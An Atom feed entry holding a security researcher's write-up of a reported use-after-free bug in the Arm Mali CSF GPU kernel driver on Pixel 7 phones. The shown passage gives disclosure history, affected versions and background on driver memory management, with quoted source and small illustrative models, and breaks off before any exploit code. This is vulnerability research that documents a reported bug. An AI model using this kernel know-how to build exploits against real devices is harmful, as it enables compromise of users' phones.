<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="https://kyeojy.github.io/feed.xml" rel="self" type="application/atom+xml" /><link href="https://kyeojy.github.io/" rel="alternate" type="text/html" /><updated>2026-06-15T04:46:36+00:00</updated><id>https://kyeojy.github.io/feed.xml</id><title type="html">kyeojy | Security Discourse</title><subtitle>Musings of a random individual on cybersecurity matters</subtitle><author><name>kyeojy</name></author><entry><title type="html">An old Pixel rooting bug</title><link href="https://kyeojy.github.io/posts/mali-csf-exploit/" rel="alternate" type="text/html" title="An old Pixel rooting bug" /><published>2026-06-04T00:00:00+00:00</published><updated>2026-06-04T00:00:00+00:00</updated><id>https://kyeojy.github.io/posts/mali-csf-exploit</id><content type="html" xml:base="https://kyeojy.github.io/posts/mali-csf-exploit/"><![CDATA[<p>This post documents a Use-After-Free (UAF) issue in the Arm Mali GPU kernel driver that I discovered sometime in Oct-Nov 2022.</p>

<p>After finding the vulnerability, I spent some time researching how to exploit it, but was also busy with other work commitments. When I checked again in Jan 2023, I discovered that the bug had already been patched in Arm’s latest <code class="language-plaintext highlighter-rouge">r41p0</code> driver. However, the latest stable and developer preview firmware on Pixel 7/7 Pro devices still included a vulnerable version of the kernel driver, and the issue had not yet been publicly disclosed. The fix was pending release in an upcoming firmware version that was still in development, so I decided to report the issue to Google and Arm, in case other vendors using the latest Arm GPUs were also at risk from attackers targeting the patch gap. The issue reported to Google was <a href="https://issuetracker.google.com/u/1/issues/270529096">Issue 270529096</a>.</p>

<p>I later found out that the bug is a variant of <a href="https://project-zero.issues.chromium.org/issues/42451508">the one reported by Google’s Project Zero team</a>, and that the root cause of the latter bug had already been discovered internally by Arm prior to Project Zero’s report. The variant discovered by Project Zero was assigned <code class="language-plaintext highlighter-rouge">CVE-2022-42716</code>, while, as far as I am aware, there is no public write-up or CVE for the variant this post covers.</p>

<p>I particularly enjoyed the entire process of discovering and exploiting this vulnerability, which I think warrants a post that shares the details. Note that the implementation details are discussed in the context of the Mali kernel drivers up to <code class="language-plaintext highlighter-rouge">r41p0</code>, and may not reflect the current state of the latest release. Exploitation of the bug on Pixel 7/7 Pro is discussed later in the post.</p>

<h1 id="background">Background</h1>

<p>The Arm Mali Command Stream Frontend (CSF) is an implementation in Arm Mali GPUs
that supersedes the older job manager (JM) framework to enable greater efficiency when
handling GPU workloads. It uses a combination of hardware and firmware to offload work that
was previously dependent on the CPU and is implemented in Arm Mali <code class="language-plaintext highlighter-rouge">G310</code>, <code class="language-plaintext highlighter-rouge">G510</code>, <code class="language-plaintext highlighter-rouge">G610</code>,
<code class="language-plaintext highlighter-rouge">G710</code>, <code class="language-plaintext highlighter-rouge">G615</code>, <code class="language-plaintext highlighter-rouge">G715</code> and <code class="language-plaintext highlighter-rouge">Immortalis-G715</code> (as of December 2022). These GPUs shipped in
what were then newer-generation devices, such as the Google Pixel 7/7 Pro, Honor 70 Pro+ and Oppo Find N2 Flip.
The exploit was tested on the Google Pixel 7 (global edition) factory images
<code class="language-plaintext highlighter-rouge">TD1A.220804.031</code>, <code class="language-plaintext highlighter-rouge">TQ1A.221205.011</code>, <code class="language-plaintext highlighter-rouge">TQ1A.230105.001.A2</code> and <code class="language-plaintext highlighter-rouge">TQ1A.230205.002</code> with no
additional configuration needed. The vulnerability affects Arm Mali Bifrost and Valhall kernel drivers from
<code class="language-plaintext highlighter-rouge">r31p0</code> to <code class="language-plaintext highlighter-rouge">r40p0</code>.</p>

<p>Each process that uses the Mali kernel driver will initiate the creation of a new <code class="language-plaintext highlighter-rouge">struct
kbase_context</code> that holds metadata and information pertinent to the kernel’s GPU state for that
process. There is a <code class="language-plaintext highlighter-rouge">struct kbase_device</code> that represents an instance of the GPU platform
device and is accessible from every <code class="language-plaintext highlighter-rouge">kbase_context</code> for accessing device-wide data. The GPU
virtual address space is segmented into different virtual address (VA) zones, for example the
<code class="language-plaintext highlighter-rouge">KBASE_REG_ZONE_SAME_VA</code> zone (for memory allocations where the GPU virtual address will be
the same as the CPU virtual address), <code class="language-plaintext highlighter-rouge">KBASE_REG_ZONE_CUSTOM_VA</code> (for custom memory
allocations such as Just-In-Time (JIT) allocations) and <code class="language-plaintext highlighter-rouge">KBASE_REG_ZONE_EXEC_VA</code> (for the
GPU-executable allocations that don’t need the <code class="language-plaintext highlighter-rouge">SAME_VA</code> property).</p>

<h2 id="zones-and-regions">Zones and regions</h2>

<p>Each GPU memory allocation is represented by a <code class="language-plaintext highlighter-rouge">struct kbase_va_region</code>, and
each virtual address zone is initialized as a region as well. The entire virtual address space is
represented by regions in a red-black tree, with each zone represented as a subtree. When
memory is allocated in a zone, a new region is created. Upon being mapped into the
GPU address space, it either replaces a free region in the tree [1], is inserted before [2] or after [3] an
existing free region, or splits a previously free region in the tree [4].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">kbase_insert_va_region_nolock</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="n">new_reg</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="n">at_reg</span><span class="p">,</span> <span class="n">u64</span> <span class="n">start_pfn</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">nr_pages</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="n">reg_rbtree</span> <span class="o">=</span> <span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">rbtree</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="n">new_reg</span><span class="o">-&gt;</span><span class="n">start_pfn</span> <span class="o">=</span> <span class="n">start_pfn</span><span class="p">;</span>
	<span class="n">new_reg</span><span class="o">-&gt;</span><span class="n">nr_pages</span> <span class="o">=</span> <span class="n">nr_pages</span><span class="p">;</span>

	<span class="cm">/* Regions are a whole use, so swap and delete old one. */</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">start_pfn</span> <span class="o">==</span> <span class="n">start_pfn</span> <span class="o">&amp;&amp;</span> <span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">nr_pages</span> <span class="o">==</span> <span class="n">nr_pages</span><span class="p">)</span> <span class="p">{</span>  <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
		<span class="n">rb_replace_node</span><span class="p">(</span><span class="o">&amp;</span><span class="p">(</span><span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">rblink</span><span class="p">),</span> <span class="o">&amp;</span><span class="p">(</span><span class="n">new_reg</span><span class="o">-&gt;</span><span class="n">rblink</span><span class="p">),</span>
								<span class="n">reg_rbtree</span><span class="p">);</span>
		<span class="n">kfree</span><span class="p">(</span><span class="n">at_reg</span><span class="p">);</span>
	<span class="p">}</span>
	<span class="cm">/* New region replaces the start of the old one, so insert before. */</span>
	<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">start_pfn</span> <span class="o">==</span> <span class="n">start_pfn</span><span class="p">)</span> <span class="p">{</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
		<span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">start_pfn</span> <span class="o">+=</span> <span class="n">nr_pages</span><span class="p">;</span>
		<span class="n">KBASE_DEBUG_ASSERT</span><span class="p">(</span><span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">nr_pages</span> <span class="o">&gt;=</span> <span class="n">nr_pages</span><span class="p">);</span>
		<span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">nr_pages</span> <span class="o">-=</span> <span class="n">nr_pages</span><span class="p">;</span>

		<span class="n">kbase_region_tracker_insert</span><span class="p">(</span><span class="n">new_reg</span><span class="p">);</span>
	<span class="p">}</span>
	<span class="cm">/* New region replaces the end of the old one, so insert after. */</span>
	<span class="k">else</span> <span class="k">if</span> <span class="p">((</span><span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">start_pfn</span> <span class="o">+</span> <span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">nr_pages</span><span class="p">)</span> <span class="o">==</span> <span class="p">(</span><span class="n">start_pfn</span> <span class="o">+</span> <span class="n">nr_pages</span><span class="p">))</span> <span class="p">{</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
		<span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">nr_pages</span> <span class="o">-=</span> <span class="n">nr_pages</span><span class="p">;</span>

		<span class="n">kbase_region_tracker_insert</span><span class="p">(</span><span class="n">new_reg</span><span class="p">);</span>
	<span class="p">}</span>
	<span class="cm">/* New region splits the old one, so insert and create new */</span>
	<span class="k">else</span> <span class="p">{</span>   <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">4</span><span class="p">]</span>
		<span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="n">new_front_reg</span><span class="p">;</span>

		<span class="n">new_front_reg</span> <span class="o">=</span> <span class="n">kbase_alloc_free_region</span><span class="p">(</span><span class="n">reg_rbtree</span><span class="p">,</span>
				<span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">start_pfn</span><span class="p">,</span>
				<span class="n">start_pfn</span> <span class="o">-</span> <span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">start_pfn</span><span class="p">,</span>
				<span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">KBASE_REG_ZONE_MASK</span><span class="p">);</span>

		<span class="k">if</span> <span class="p">(</span><span class="n">new_front_reg</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">nr_pages</span> <span class="o">-=</span> <span class="n">nr_pages</span> <span class="o">+</span> <span class="n">new_front_reg</span><span class="o">-&gt;</span><span class="n">nr_pages</span><span class="p">;</span>
			<span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">start_pfn</span> <span class="o">=</span> <span class="n">start_pfn</span> <span class="o">+</span> <span class="n">nr_pages</span><span class="p">;</span>

			<span class="n">kbase_region_tracker_insert</span><span class="p">(</span><span class="n">new_front_reg</span><span class="p">);</span>
			<span class="n">kbase_region_tracker_insert</span><span class="p">(</span><span class="n">new_reg</span><span class="p">);</span>
		<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
			<span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>
		<span class="p">}</span>
	<span class="p">}</span>

	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
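<p>The four cases can be condensed into a small standalone sketch. This is not driver code: <code class="language-plaintext highlighter-rouge">classify_insert</code> and <code class="language-plaintext highlighter-rouge">enum insert_case</code> are hypothetical names introduced here for illustration, and the sketch assumes the caller has already ensured that the new range lies entirely within the free region.</p>

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical names: the driver defines no such enum or function. */
enum insert_case {
	INSERT_REPLACE = 1, /* [1] new region covers the whole free region */
	INSERT_BEFORE  = 2, /* [2] new region takes the start of the free region */
	INSERT_AFTER   = 3, /* [3] new region takes the end of the free region */
	INSERT_SPLIT   = 4  /* [4] new region sits strictly inside the free region */
};

/*
 * Decide which branch would be taken when a new region of nr_pages pages
 * starting at start_pfn is placed inside the free region described by
 * at_start_pfn and at_nr_pages. Assumes the new range is fully contained
 * in the free region.
 */
enum insert_case classify_insert(uint64_t at_start_pfn, size_t at_nr_pages,
				 uint64_t start_pfn, size_t nr_pages)
{
	if (at_start_pfn == start_pfn && at_nr_pages == nr_pages)
		return INSERT_REPLACE;
	if (at_start_pfn == start_pfn)
		return INSERT_BEFORE;
	if (at_start_pfn + at_nr_pages == start_pfn + nr_pages)
		return INSERT_AFTER;
	return INSERT_SPLIT;
}
```

<p>For a free region covering page frames 100 to 109, a 10-page request at 100 hits case [1], a 4-page request at 100 hits [2], a 4-page request at 106 hits [3], and a 4-page request at 103 hits [4]. Only case [1] frees the old region, and only case [4] allocates an extra one.</p>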

<h2 id="memory-management-and-allocations-in-the-gpu-driver">Memory management and allocations in the GPU driver</h2>

<p>Some memory management details are covered in
<a href="https://github.blog/2022-07-27-corrupting-memory-without-memory-corruption/">this great write-up by Man Yue Mo</a>, and I would be remiss not to reiterate some of them. GPU memory must first be allocated
with the ioctl call <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_MEM_ALLOC</code>, which triggers the function <code class="language-plaintext highlighter-rouge">kbase_mem_alloc</code>. Flags
such as <code class="language-plaintext highlighter-rouge">BASE_MEM_PROT_CPU_RD</code> (allowing CPU read access) and <code class="language-plaintext highlighter-rouge">BASE_MEM_PROT_GPU_WR</code>
(allowing GPU write access) can be set on the region to determine its properties. Each region contains a <code class="language-plaintext highlighter-rouge">gpu_alloc</code> and a <code class="language-plaintext highlighter-rouge">cpu_alloc</code> member, each of which is a <code class="language-plaintext highlighter-rouge">struct
kbase_mem_phy_alloc</code> that tracks information regarding the region’s backing physical pages for
the CPU or GPU. For 64-bit applications that use the driver, the CSF implementation forces the
<code class="language-plaintext highlighter-rouge">KCTX_FORCE_SAME_VA</code> flag on the <code class="language-plaintext highlighter-rouge">kbase_context</code>. This enforces the <code class="language-plaintext highlighter-rouge">BASE_MEM_SAME_VA</code> flag
for the memory allocation, ensuring that the region has the same virtual address on both the
GPU and CPU.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="nf">kbase_create_context</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_device</span> <span class="o">*</span><span class="n">kbdev</span><span class="p">,</span>
		<span class="n">bool</span> <span class="n">is_compat</span><span class="p">,</span>
		<span class="n">base_context_create_flags</span> <span class="k">const</span> <span class="n">flags</span><span class="p">,</span>
		<span class="kt">unsigned</span> <span class="kt">long</span> <span class="k">const</span> <span class="n">api_version</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="k">const</span> <span class="n">filp</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
<span class="cp">#if defined(CONFIG_64BIT)
</span>	<span class="k">else</span>
		<span class="n">kbase_ctx_flag_set</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">KCTX_FORCE_SAME_VA</span><span class="p">);</span>
<span class="cp">#endif </span><span class="cm">/* defined(CONFIG_64BIT) */</span><span class="cp">
</span>	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">kbase_api_mem_alloc_ex</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span>
				  <span class="k">union</span> <span class="n">kbase_ioctl_mem_alloc_ex</span> <span class="o">*</span><span class="n">alloc_ex</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">((</span><span class="o">!</span><span class="n">kbase_ctx_flag</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">KCTX_COMPAT</span><span class="p">))</span> <span class="o">&amp;&amp;</span>
			<span class="n">kbase_ctx_flag</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">KCTX_FORCE_SAME_VA</span><span class="p">))</span> <span class="p">{</span>
		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">gpu_executable</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="n">fixed_or_fixable</span><span class="p">)</span>
			<span class="n">flags</span> <span class="o">|=</span> <span class="n">BASE_MEM_SAME_VA</span><span class="p">;</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>For <code class="language-plaintext highlighter-rouge">BASE_MEM_SAME_VA</code> allocations, <code class="language-plaintext highlighter-rouge">kbase_mem_alloc</code> eventually returns a cookie that can be
used in a call to <code class="language-plaintext highlighter-rouge">mmap</code> to map the region into the GPU page tables.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="nf">kbase_mem_alloc</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span> <span class="n">u64</span> <span class="n">va_pages</span><span class="p">,</span> <span class="n">u64</span> <span class="n">commit_pages</span><span class="p">,</span>
				<span class="n">u64</span> <span class="n">extension</span><span class="p">,</span> <span class="n">u64</span> <span class="o">*</span><span class="n">flags</span><span class="p">,</span> <span class="n">u64</span> <span class="o">*</span><span class="n">gpu_va</span><span class="p">,</span>
				<span class="k">enum</span> <span class="n">kbase_caller_mmu_sync_info</span> <span class="n">mmu_sync_info</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="cm">/* mmap needed to setup VA? */</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">*</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">BASE_MEM_SAME_VA</span><span class="p">)</span> <span class="p">{</span>
		<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">cookie</span><span class="p">,</span> <span class="n">cookie_nr</span><span class="p">;</span>

		<span class="cm">/* Bind to a cookie */</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">bitmap_empty</span><span class="p">(</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">cookies</span><span class="p">,</span> <span class="n">BITS_PER_LONG</span><span class="p">))</span> <span class="p">{</span>
			<span class="n">dev_err</span><span class="p">(</span><span class="n">dev</span><span class="p">,</span> <span class="s">"No cookies available for allocation!"</span><span class="p">);</span>
			<span class="n">kbase_gpu_vm_unlock</span><span class="p">(</span><span class="n">kctx</span><span class="p">);</span>
			<span class="k">goto</span> <span class="n">no_cookie</span><span class="p">;</span>
		<span class="p">}</span>
		<span class="cm">/* return a cookie */</span>
		<span class="n">cookie_nr</span> <span class="o">=</span> <span class="n">find_first_bit</span><span class="p">(</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">cookies</span><span class="p">,</span> <span class="n">BITS_PER_LONG</span><span class="p">);</span>
		<span class="n">bitmap_clear</span><span class="p">(</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">cookies</span><span class="p">,</span> <span class="n">cookie_nr</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
		<span class="n">BUG_ON</span><span class="p">(</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">pending_regions</span><span class="p">[</span><span class="n">cookie_nr</span><span class="p">]);</span>
		<span class="n">kctx</span><span class="o">-&gt;</span><span class="n">pending_regions</span><span class="p">[</span><span class="n">cookie_nr</span><span class="p">]</span> <span class="o">=</span> <span class="n">reg</span><span class="p">;</span>

		<span class="cm">/* relocate to correct base */</span>
		<span class="n">cookie</span> <span class="o">=</span> <span class="n">cookie_nr</span> <span class="o">+</span> <span class="n">PFN_DOWN</span><span class="p">(</span><span class="n">BASE_MEM_COOKIE_BASE</span><span class="p">);</span>
		<span class="n">cookie</span> <span class="o">&lt;&lt;=</span> <span class="n">PAGE_SHIFT</span><span class="p">;</span>

		<span class="o">*</span><span class="n">gpu_va</span> <span class="o">=</span> <span class="p">(</span><span class="n">u64</span><span class="p">)</span> <span class="n">cookie</span><span class="p">;</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
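<p>The cookie arithmetic can be modelled outside the kernel as follows. This is only a sketch: the <code class="language-plaintext highlighter-rouge">sketch_</code>/<code class="language-plaintext highlighter-rouge">SKETCH_</code> names are hypothetical, and the 4 KiB page size and the cookie base of <code class="language-plaintext highlighter-rouge">64 &lt;&lt; 12</code> are assumptions that should be checked against the driver headers.</p>

```c
#include <stdint.h>

/* Assumed values for illustration; check the driver headers for the real ones. */
#define SKETCH_PAGE_SHIFT  12	/* 4 KiB pages */
#define SKETCH_COOKIE_BASE (UINT64_C(64) << SKETCH_PAGE_SHIFT)
#define SKETCH_NR_COOKIES  64	/* stands in for BITS_PER_LONG */

/*
 * Take the lowest free cookie slot from *free_mask (set bit = free) and
 * return the page-aligned cookie value handed back to user space.
 * Returns 0 if no slot is free.
 */
uint64_t sketch_take_cookie(uint64_t *free_mask)
{
	for (unsigned int nr = 0; nr < SKETCH_NR_COOKIES; nr++) {
		uint64_t bit = UINT64_C(1) << nr;

		if (*free_mask & bit) {
			*free_mask &= ~bit;	/* mirrors bitmap_clear() */
			/* mirrors (cookie_nr + PFN_DOWN(base)) << PAGE_SHIFT */
			return (nr + (SKETCH_COOKIE_BASE >> SKETCH_PAGE_SHIFT))
				<< SKETCH_PAGE_SHIFT;
		}
	}
	return 0;
}
```

<p>Under these assumptions, slot 1 yields the cookie <code class="language-plaintext highlighter-rouge">0x41000</code>. The value is not a real address; it only identifies the pending region when it is later passed to <code class="language-plaintext highlighter-rouge">mmap</code>.</p>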

<p>The physical pages that back the region are allocated with <code class="language-plaintext highlighter-rouge">kbase_alloc_phy_pages_helper</code>.
Since 2MB allocations are disabled by default on the Mali GPU for Pixel 7/7 Pro,
<code class="language-plaintext highlighter-rouge">kbase_mem_pool_alloc_pages</code> is called to allocate the pages from the <code class="language-plaintext highlighter-rouge">kbase_context</code>
memory pool.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_alloc_phy_pages_helper</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_mem_phy_alloc</span> <span class="o">*</span><span class="n">alloc</span><span class="p">,</span>
		<span class="kt">size_t</span> <span class="n">nr_pages_requested</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
<span class="cp">#ifdef CONFIG_MALI_2MB_ALLOC
</span>	<span class="p">...</span>
<span class="cp">#endif
</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">nr_left</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">res</span> <span class="o">=</span> <span class="n">kbase_mem_pool_alloc_pages</span><span class="p">(</span>
			<span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">mem_pools</span><span class="p">.</span><span class="n">small</span><span class="p">[</span><span class="n">alloc</span><span class="o">-&gt;</span><span class="n">group_id</span><span class="p">],</span>
			<span class="n">nr_left</span><span class="p">,</span> <span class="n">tp</span><span class="p">,</span> <span class="nb">false</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">res</span> <span class="o">&lt;=</span> <span class="mi">0</span><span class="p">)</span>
			<span class="k">goto</span> <span class="n">alloc_failed</span><span class="p">;</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">kbase_mem_pool_alloc_pages</code> attempts to allocate from the current <code class="language-plaintext highlighter-rouge">kbase_context</code> memory
pool first [1] and if there are insufficient pages, it tries to allocate from that pool’s next memory pool [2].
The next memory pool of every <code class="language-plaintext highlighter-rouge">kbase_context</code> memory pool will be the <code class="language-plaintext highlighter-rouge">kbase_device</code>
memory pool of the same <code class="language-plaintext highlighter-rouge">group_id</code> (i.e. based on the snippet of code above, the next pool will be
<code class="language-plaintext highlighter-rouge">kctx-&gt;kbdev-&gt;mem_pools.small[alloc-&gt;group_id]</code>). If the next pool also has insufficient
pages, it will try to allocate from the kernel itself [3]. There are 16 <code class="language-plaintext highlighter-rouge">group_id</code>s in total, ranging from
0 to 15, which corresponds to the value of <code class="language-plaintext highlighter-rouge">MEMORY_GROUP_MANAGER_NR_GROUPS</code>. The memory pools are an optimization: they reuse pages that were previously allocated from the kernel, avoiding the more costly kernel allocation and freeing routines.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_mem_pool_alloc_pages</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_mem_pool</span> <span class="o">*</span><span class="n">pool</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">nr_4k_pages</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">tagged_addr</span> <span class="o">*</span><span class="n">pages</span><span class="p">,</span> <span class="n">bool</span> <span class="n">partial_allowed</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="cm">/* Get pages from this pool */</span>
	<span class="n">kbase_mem_pool_lock</span><span class="p">(</span><span class="n">pool</span><span class="p">);</span>
	<span class="n">nr_from_pool</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">nr_pages_internal</span><span class="p">,</span> <span class="n">kbase_mem_pool_size</span><span class="p">(</span><span class="n">pool</span><span class="p">));</span>
	<span class="k">while</span> <span class="p">(</span><span class="n">nr_from_pool</span><span class="o">--</span><span class="p">)</span> <span class="p">{</span>
		<span class="kt">int</span> <span class="n">j</span><span class="p">;</span>
		<span class="n">p</span> <span class="o">=</span> <span class="n">kbase_mem_pool_remove_locked</span><span class="p">(</span><span class="n">pool</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
		<span class="p">...</span>
	<span class="p">}</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span class="o">!=</span> <span class="n">nr_4k_pages</span> <span class="o">&amp;&amp;</span> <span class="n">pool</span><span class="o">-&gt;</span><span class="n">next_pool</span><span class="p">)</span> <span class="p">{</span>   <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
		<span class="cm">/* Allocate via next pool */</span>
		<span class="n">err</span> <span class="o">=</span> <span class="n">kbase_mem_pool_alloc_pages</span><span class="p">(</span><span class="n">pool</span><span class="o">-&gt;</span><span class="n">next_pool</span><span class="p">,</span>
				<span class="n">nr_4k_pages</span> <span class="o">-</span> <span class="n">i</span><span class="p">,</span> <span class="n">pages</span> <span class="o">+</span> <span class="n">i</span><span class="p">,</span> <span class="n">partial_allowed</span><span class="p">);</span>
		<span class="p">...</span>
	<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
		<span class="cm">/* Get any remaining pages from kernel */</span>
		<span class="k">while</span> <span class="p">(</span><span class="n">i</span> <span class="o">!=</span> <span class="n">nr_4k_pages</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">p</span> <span class="o">=</span> <span class="n">kbase_mem_alloc_page</span><span class="p">(</span><span class="n">pool</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
			<span class="p">...</span>
		<span class="p">}</span>
		<span class="p">...</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
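<p>The fallback order [1], [2], [3] can be illustrated with a simplified model that tracks page counts only. <code class="language-plaintext highlighter-rouge">struct sketch_pool</code>, <code class="language-plaintext highlighter-rouge">struct sketch_stats</code> and <code class="language-plaintext highlighter-rouge">sketch_pool_alloc</code> are hypothetical stand-ins, not driver types, and the model assumes that allocating from the kernel never fails.</p>

```c
#include <stddef.h>

/* Hypothetical, simplified stand-in for struct kbase_mem_pool. */
struct sketch_pool {
	size_t cur_size;		/* pages currently cached in this pool */
	struct sketch_pool *next_pool;	/* NULL at the end of the chain */
};

/* Running total of pages that had to come from the kernel allocator. */
struct sketch_stats {
	size_t from_kernel;
};

/*
 * Satisfy a request for nr_pages: drain this pool first [1], hand the
 * remainder to the next pool if there is one [2], and only fall back to
 * the kernel at the end of the chain [3]. Returns the pages obtained.
 */
size_t sketch_pool_alloc(struct sketch_pool *pool, size_t nr_pages,
			 struct sketch_stats *stats)
{
	size_t got = nr_pages < pool->cur_size ? nr_pages : pool->cur_size;

	pool->cur_size -= got;

	if (got != nr_pages && pool->next_pool) {
		got += sketch_pool_alloc(pool->next_pool, nr_pages - got, stats);
	} else if (got != nr_pages) {
		/* The sketch assumes kernel allocation always succeeds. */
		stats->from_kernel += nr_pages - got;
		got = nr_pages;
	}
	return got;
}
```

<p>With a context pool holding 2 pages chained to a device pool holding 3, a request for 8 pages empties both pools and takes the remaining 3 pages from the kernel. A following request then goes straight to the kernel, which is the costly path the pools exist to avoid.</p>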

<p><a id="free_phy_pages_helper"></a>Similarly, when freeing pages, the driver uses <code class="language-plaintext highlighter-rouge">kbase_free_phy_pages_helper</code>, which calls
<code class="language-plaintext highlighter-rouge">kbase_mem_pool_free_pages</code> [1].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_free_phy_pages_helper</span><span class="p">(</span>
	<span class="k">struct</span> <span class="n">kbase_mem_phy_alloc</span> <span class="o">*</span><span class="n">alloc</span><span class="p">,</span>
	<span class="kt">size_t</span> <span class="n">nr_pages_to_free</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">while</span> <span class="p">(</span><span class="n">nr_pages_to_free</span><span class="p">)</span> <span class="p">{</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">is_huge_head</span><span class="p">(</span><span class="o">*</span><span class="n">start_free</span><span class="p">))</span> <span class="p">{</span>
			<span class="cm">/* This is a 2MB entry, so free all the 512 pages that
			 * it points to
			 */</span>
			<span class="p">...</span>
		<span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">is_partial</span><span class="p">(</span><span class="o">*</span><span class="n">start_free</span><span class="p">))</span> <span class="p">{</span>
			<span class="p">...</span>
		<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
